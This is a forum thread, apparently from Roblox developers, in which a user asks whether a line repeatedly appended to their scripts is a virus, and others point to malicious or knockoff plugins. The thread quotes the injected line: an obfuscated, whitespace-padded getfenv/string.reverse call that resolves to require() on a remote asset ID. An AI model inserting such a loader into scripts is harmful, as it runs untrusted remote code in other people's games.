Is this a virus?

I’m scripting and I noticed this thing keeps appearing in the every end of the lines of my scripts

RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5723263360) --[[                                                                                                  ]]--

Is this a feature or a virus from a plugin that I use

8 Likes

Most likely a virus, check all of your plugins and scripts, I also recommend a plugin, but I haven’t heard of a plugin importing a script in every line of code. Seems odd…

GameGuard Anti Virus V2 - The plugin

2 Likes

Not sure what the picture is to do with but it does seem like a plugin may be doing that.

1 Like

Idk, try copying the yellow numbers and paste them into Roblox and see if it is a game id.

1 Like

I deleted the line and this popped up
Screenshot_38

What plugin did you use exactly?
You have to be careful about which ones you use because they will insert viruses into your game IF you use the knockoff one.

I’m not familiar with scripting, but i am speaking off past experiences with bad plugins.

1 Like

That is a feature of Roblox now I believe. This happened to me as well with the Last synced.

This might be the plugin causing this, I don’t think that this is a virus, considering who created it, but if it’s annoying, you should delete it.

https://www.roblox.com/library/1677658659/Time-Tracker

You also have a fake Moon animator:

https://www.roblox.com/library/5647231678/Moon-Animator

1 Like

I am not using any plugings like that though and I receive the same message at the end of my scripts.

These are all of the ones I use

I downloaded moon animator before but I undownloaded it.
I also use Time Tracker

It says you own them? Try removing them completely from your inventory and from your plugins page.

1 Like

And one moon animator is the real deal, the link I sent is the virus one (most likely)

1 Like

Use the plugin I sent in my previous post to check.

I had no problem using these plugins before though. The last synced thing only started happening yesterday. I’ve had time tracker for a few months already

Certain plugins may take time to import viruses (at least, I think), they can also get edited as far as I know. Meaning, the owner could add a virus later on.

Maybe it is because I use insert catalog items.

There is 4 copies of these and they all have a lot of downloads. I can’t tell which one is real

1 Like

I highly recommend to not download any plugins you may be unsure of, ESPECIALLY copies. Major red flag right there.

2 Likes

As I said, the plugin that I sent checks for scripts and plugins. Not sure what you mean by catalog items? Models? If that’s the case, I suggest checking every script in them.

1 Like

Oh, and as @Bl0oMz said, don’t download any plugins carelessly, I suggest searching up the plugin everywhere you can before downloading. Don’t also use free models that don’t have the Roblox verified check (or whatever it’s called), only use them to learn or to develop something that you currently can’t.

1 Like

@SkyWalk1n @BL0oMz

I uninstalled the insert catalog items plugin and I searched for viruses on the plugin @SkyWalk1n linked. There was no virus

2 Likes